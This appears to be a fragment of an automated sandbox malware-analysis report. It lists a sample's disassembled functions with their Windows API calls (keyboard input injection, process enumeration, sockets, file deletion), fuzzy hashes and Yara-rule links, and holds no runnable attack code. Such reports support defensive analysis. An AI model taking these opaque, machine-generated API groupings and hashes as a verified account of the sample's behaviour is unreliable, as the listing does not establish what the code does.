                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: __alldvrm$_strrchr
                                                                    • String ID:
                                                                    • API String ID: 1036877536-0
                                                                    • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                    • Instruction ID: 6987746c2fa5abe8163f56348689659d9ad3bffef2560c04cc6ae534b07079b0
                                                                    • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                    • Instruction Fuzzy Hash: 55A11672F0438AAFEB158F19C8917EABBF9EF69350F14416DE5959B281C23889C2C750
                                                                    Function 0096342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInitInitializeUninitialize
                                                                    • String ID:
                                                                    • API String ID: 1998397398-0
                                                                    • Opcode ID: 106fb710beccd7f1cc177696f6f346db61c2511039dd39badb8f7b3371ada0b5
                                                                    • Instruction ID: ecac808ce0df68c75a58b93e2774b1c73534628f298cb2c65074fdefdf8aa075
                                                                    • Opcode Fuzzy Hash: 106fb710beccd7f1cc177696f6f346db61c2511039dd39badb8f7b3371ada0b5
                                                                    • Instruction Fuzzy Hash: DAA116756047009FC710DF29C985A2AB7E9FF89714F048859F98ADB362DB30EE05CB92
                                                                    Function 00940436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0097FC08,?), ref: 009405F0
                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0097FC08,?), ref: 00940608
                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0097CC40,000000FF,?,00000000,00000800,00000000,?,0097FC08,?), ref: 0094062D
                                                                    • _memcmp.LIBVCRUNTIME ref: 0094064E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                    • String ID:
                                                                    • API String ID: 314563124-0
                                                                    • Opcode ID: 5996e8987ecba48f01d54a0791180a5876edbff77ad8674e5c4d030b2fdd4de5
                                                                    • Instruction ID: d7a443dfd0a0f255739ba4871becaefedcd52c51e39ba9ba7696ab9cc0501251
                                                                    • Opcode Fuzzy Hash: 5996e8987ecba48f01d54a0791180a5876edbff77ad8674e5c4d030b2fdd4de5
                                                                    • Instruction Fuzzy Hash: 8281F975A00109EFCB04DF94C984EEEB7B9FF89315F204598F606AB250DB71AE46CB61
                                                                    Function 00921391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: 8cd172302c2ba53d20598fd0976e3db2a8b55795d44cbd0d84287f16eebc19be
                                                                    • Instruction ID: 26edc3317f2c714eba2aa19562f741a4caab0168c32c480b54107ddb10fa17b7
                                                                    • Opcode Fuzzy Hash: 8cd172302c2ba53d20598fd0976e3db2a8b55795d44cbd0d84287f16eebc19be
                                                                    • Instruction Fuzzy Hash: CD416C31A00125AFDB357BFDBC45BBE3AA8EFE1370F144226F42CD61E5E63449A152A1
                                                                    Function 00976278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowRect.USER32(00BBE670,?), ref: 009762E2
                                                                    • ScreenToClient.USER32(?,?), ref: 00976315
                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00976382
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientMoveRectScreen
                                                                    • String ID:
                                                                    • API String ID: 3880355969-0
                                                                    • Opcode ID: c29f466e4ac074ea2a55d9ed15847792385ba33239d31335fbbeb257a57a3b38
                                                                    • Instruction ID: f6ad3acf272682f561cce66a65d2e39598ff34eb2fc385d739145ff26a36f0c5
                                                                    • Opcode Fuzzy Hash: c29f466e4ac074ea2a55d9ed15847792385ba33239d31335fbbeb257a57a3b38
                                                                    • Instruction Fuzzy Hash: 8B514C72A00649AFCF14DF68D980AAE7BB9FF85360F108259F819972A0D730ED81DB50
                                                                    Function 00961AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00961AFD
                                                                    • WSAGetLastError.WSOCK32 ref: 00961B0B
                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00961B8A
                                                                    • WSAGetLastError.WSOCK32 ref: 00961B94
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$socket
                                                                    • String ID:
                                                                    • API String ID: 1881357543-0
                                                                    • Opcode ID: 1b9efd61b95ed3a13337afde917d322704a139b11386abfcfbdf3eb636675305
                                                                    • Instruction ID: 70146b392454769c4e944f3344cadceeeafd5ffa5ed7667d09ac0e33424323b3
                                                                    • Opcode Fuzzy Hash: 1b9efd61b95ed3a13337afde917d322704a139b11386abfcfbdf3eb636675305
                                                                    • Instruction Fuzzy Hash: 2D419075600200AFE720AF39C886F2A77E5EB45718F588458FA1A9F3D3D772DD428B91
                                                                    Function 0091B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 58bba937667f69e834bffe38574f8391edf13e5b4d3da64c8287ba8adb51399e
                                                                    • Instruction ID: 9d3145677659bca4cd52a5085324674074f963cae57e7d1794f7c68c536ba48d
                                                                    • Opcode Fuzzy Hash: 58bba937667f69e834bffe38574f8391edf13e5b4d3da64c8287ba8adb51399e
                                                                    • Instruction Fuzzy Hash: 0D410871B00318AFD724AF78CC41BAABBEAEBC8710F10852EF156DB6D1D77199918790
                                                                    Function 009556D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00955783
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 009557A9
                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009557CE
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009557FA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 3321077145-0
                                                                    • Opcode ID: 3ad9a2523867e59c2c60a6a0896506ace67c3628a291241bd61a1241aff81c00
                                                                    • Instruction ID: 21e83da1695cfd5f498cde62c5b9eb4f9271431bd57f210d2cce71045818fa54
                                                                    • Opcode Fuzzy Hash: 3ad9a2523867e59c2c60a6a0896506ace67c3628a291241bd61a1241aff81c00
                                                                    • Instruction Fuzzy Hash: 7C412D35600A50DFCB11DF1AC444A1EBBE5FF89321B198488ED5A9B362CB34FD45CB91
                                                                    Function 0091D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00906D71,00000000,00000000,009082D9,?,009082D9,?,00000001,00906D71,8BE85006,00000001,009082D9,009082D9), ref: 0091D910
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0091D999
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0091D9AB
                                                                    • __freea.LIBCMT ref: 0091D9B4
                                                                      • Part of subcall function 00913820: RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                    • String ID:
                                                                    • API String ID: 2652629310-0
                                                                    • Opcode ID: 0c48abd95cf552bcb5e718d5e18b60ab45ace04d88d810477af643eace62501c
                                                                    • Instruction ID: c30ff670d3e7fec24622388258bba52c394b7fd1418eec9d5e3f7d959e8db187
                                                                    • Opcode Fuzzy Hash: 0c48abd95cf552bcb5e718d5e18b60ab45ace04d88d810477af643eace62501c
                                                                    • Instruction Fuzzy Hash: 3A31AD72B1221AABDF249F65DC45EEE7BA9EB41710B054168FC04D6290EB35DD90CBA0
                                                                    Function 009752C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00975352
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00975375
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00975382
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009753A8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$InvalidateMessageRectSend
                                                                    • String ID:
                                                                    • API String ID: 3340791633-0
                                                                    • Opcode ID: 41365cf2628503d12793a1f55a192cc0e82ca2b0ff640502661941349242ebfc
                                                                    • Instruction ID: 709dca058d738d3262a8f41ff499b206a5cf2450fd416bf531b8640dc12ac0ba
                                                                    • Opcode Fuzzy Hash: 41365cf2628503d12793a1f55a192cc0e82ca2b0ff640502661941349242ebfc
                                                                    • Instruction Fuzzy Hash: BF31E432B55A08EFEB749A14CC56BE83769AB043D0F598505FA18961F0C7F5AD80EB41
                                                                    Function 0094AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0094ABF1
                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 0094AC0D
                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 0094AC74
                                                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0094ACC6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: 036213c1031dfdddbf7a0a59a3837537220e30a1586b0d6c6ce2e820f7581468
                                                                    • Instruction ID: b59e71ed9ee1e18c2cb82873712a14425da008cc925beccc842d42b44cb6cf40
                                                                    • Opcode Fuzzy Hash: 036213c1031dfdddbf7a0a59a3837537220e30a1586b0d6c6ce2e820f7581468
                                                                    • Instruction Fuzzy Hash: EB313570A84319AFEF34CB658C84FFE7BA9AB89312F04471AE4C5931D0C3798D819792
                                                                    Function 00977674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ClientToScreen.USER32(?,?), ref: 0097769A
                                                                    • GetWindowRect.USER32(?,?), ref: 00977710
                                                                    • PtInRect.USER32(?,?,00978B89), ref: 00977720
                                                                    • MessageBeep.USER32(00000000), ref: 0097778C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1352109105-0
                                                                    • Opcode ID: 2398558f3b9e71276d817cd3f5b2c66853d143082f007aee5cbaf8581401d097
                                                                    • Instruction ID: f48a8323bf33ebe074cf6054f051a75c84be3a448517bf5bf871732f5a14a93a
                                                                    • Opcode Fuzzy Hash: 2398558f3b9e71276d817cd3f5b2c66853d143082f007aee5cbaf8581401d097
                                                                    • Instruction Fuzzy Hash: 8741AD36609255EFCB09CF98D894EA9B7F5FB49314F1481A8E418DB261C330A941DF90
                                                                    Function 009716DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 009716EB
                                                                      • Part of subcall function 00943A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00943A57
                                                                      • Part of subcall function 00943A3D: GetCurrentThreadId.KERNEL32 ref: 00943A5E
                                                                      • Part of subcall function 00943A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009425B3), ref: 00943A65
                                                                    • GetCaretPos.USER32(?), ref: 009716FF
                                                                    • ClientToScreen.USER32(00000000,?), ref: 0097174C
                                                                    • GetForegroundWindow.USER32 ref: 00971752
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                    • String ID:
                                                                    • API String ID: 2759813231-0
                                                                    • Opcode ID: 7cd6a3dd966574fb99a64b82a545b779eb080a4328275a09736ce879dfee0c08
                                                                    • Instruction ID: 91bd04c14affa14c1718ffaa3ed09077244aa6040641703d36e92ec6fcffcfe0
                                                                    • Opcode Fuzzy Hash: 7cd6a3dd966574fb99a64b82a545b779eb080a4328275a09736ce879dfee0c08
                                                                    • Instruction Fuzzy Hash: 41313072D00149AFC704DFAAC881DAEB7FDFF49304B548069E415E7211EA31DE45CBA1
                                                                    Function 0094D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0094D501
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0094D50F
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0094D52F
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0094D5DC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 420147892-0
                                                                    • Opcode ID: 9790c1f98fd15a3f75b04fef56ae26e511b5d2089e8c11c405d62effe8b31196
                                                                    • Instruction ID: 2061983c3a9cb624577068aae2c3461ab83a0aa378723831d8c5fe8342693896
                                                                    • Opcode Fuzzy Hash: 9790c1f98fd15a3f75b04fef56ae26e511b5d2089e8c11c405d62effe8b31196
                                                                    • Instruction Fuzzy Hash: FF317E721082409FD304EF54C881EAFBBE8FF9A354F54092DF585861A1EB71AA85CB93
                                                                    Function 00978FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                    • GetCursorPos.USER32(?), ref: 00979001
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00937711,?,?,?,?,?), ref: 00979016
                                                                    • GetCursorPos.USER32(?), ref: 0097905E
                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00937711,?,?,?), ref: 00979094
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                    • String ID:
                                                                    • API String ID: 2864067406-0
                                                                    • Opcode ID: 3be6b526146d9996a51fa745707030d7b07a11cfbaaa98d3f00ab2a843bda33a
                                                                    • Instruction ID: a5a181798e08ac5fb962bdb22d444c5cb8e0699caccaaf92cd9bf1e41bec8d18
                                                                    • Opcode Fuzzy Hash: 3be6b526146d9996a51fa745707030d7b07a11cfbaaa98d3f00ab2a843bda33a
                                                                    • Instruction Fuzzy Hash: DA21A336621018EFDB258F94CC58EFA7BF9FF89360F048159F90987161C3319990EB60
                                                                    Function 0094D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(?,0097CB68), ref: 0094D2FB
                                                                    • GetLastError.KERNEL32 ref: 0094D30A
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0094D319
                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0097CB68), ref: 0094D376
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 2267087916-0
                                                                    • Opcode ID: 02367dba8aeeb4de9f63614c020dc2386e8a5009aebe2aa4b5c6806b08350064
                                                                    • Instruction ID: a58cf01a0d4179cab1835d37d15f70d14eae0d63e11986a762f76b1fcee105d4
                                                                    • Opcode Fuzzy Hash: 02367dba8aeeb4de9f63614c020dc2386e8a5009aebe2aa4b5c6806b08350064
                                                                    • Instruction Fuzzy Hash: 3B21A17550A2019F8710DF28C88186A77E8FF96368F504A5DF4A9D32A1E730DE45CB93
